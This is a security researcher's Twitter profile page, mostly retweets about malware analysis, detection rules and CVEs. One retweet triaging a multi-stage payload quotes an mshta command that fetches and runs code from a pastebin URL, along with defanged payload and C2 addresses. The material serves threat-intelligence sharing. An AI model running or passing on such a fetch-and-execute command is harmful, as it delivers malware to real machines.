edx

@criznash

security, drum and bass, stuff and things. AHAtian, w00er, professional hard chatter. moderator @ - blog @

Austin, TX
Joined March 2011

Tweets


  1. Pinned tweet
    5 Dec 2018

    i promised forthcoming public research when i announced joining and my first contribution came with my first ever CVE credit for CVE-2018-15982! Massive thanks to and from my team and to for quickly patching the issue! 😁😁😁

  2. Retweeted

    "We have an obligation to read aloud to our children. To read them things they enjoy. To read to them stories we are already tired of." from for .

  3. Retweeted
    21 hours ago

    So is moving away from "Installing" & "Installed" DebugStrings to some random strings utilizing CryptGenRandom, sandbox vendors good luck!

  4. Retweeted
    3 Feb

    VB6 packers are no joke. This one took me a while to write and I do hope you enjoy it! Analyzing Modern Malware Techniques - Part 3: VB6 packers

  5. Retweeted
    3 Feb

    ICYMI announced a kernel mode anticheat engine ( ). They mention no surveillance capabilities (prove it) & others are doing it (true). My question: how much code, developers, and involvement in this? Asking for a friend.

  6. Retweeted
    29 Jan

    1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Mach-O, RTF files, and PowerShell scripts. So far I have decision trees, random forests, and logistic regression (LR) working.

  8. Retweeted

    Here are the slides from my . I fixed a few typos and added links and resources.

  9. Retweeted
    31 Jan

    The fact that malware created over a decade ago is in the top 3 detected in 2019 should help illustrate the crumbling aqueduct of technical debt that still festers unpaid in today’s Internet.

  10. Retweeted
    30 Jan

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

  13. Retweeted
    30 Jan

    TrickBot gtag MAN1: if you want the history of why me and THL talk about MAN1 -> a paper I wrote using lots of data sets that had been gathered over the years!

  14. Retweeted

    People of the Internet (esp. twitter), I am pleased to announce the launch of the at ! (just in time for !)

  16. Retweeted
    28 Jan

    1\ Surprisingly, you could build a very mediocre PE malware detector with a single PE feature: the PE compile timestamp. In fact, I built a little random forest detector that uses only the timestamp as its feature that gets 62% detection on previously unseen malware at a 1% FPR.

  17. Retweeted
    27 Jan
    Replying to

    “Give me your solvent, your rested, your rugged individualists, yearning to avoid taxes.”

  18. Retweeted
    27 Jan

    Here's a simple, cheap detection for some publicly available dos/RCE tools for the "BlueGate" RDP gateway vuln. Look for JA3=2e29256489ce9efe000820389e24b2fd on UDP 3391. CVE-2020-0609 & CVE-2020-0610 use DTLS, which / parse into ssl.log just fine.

  19. Retweeted
    27 Jan

    I wrote a bit about hunting for UEFI Implants, and realising that we’re failing as an industry -- along with some ideas of things we could do to fix it. Comments welcome, especially from and ...

  20. 27 Jan

    Adware is a joke to many organizations, to the point that they straight up ignore adware infections. The exposure is no joke, though. Some adware is highly sophisticated and feature-packed, and I’m only surprised we don’t see/hear of more cases like this.

  21. Retweeted
    27 Jan

    GreyNoise has been observing this as well. We call these Discovery Attacks. TL;DR: someone hits every server on the internet with something unique, then traces back where they sent each request to find collectors. Operationalized by (I believe) the Muhstik botnet recently.
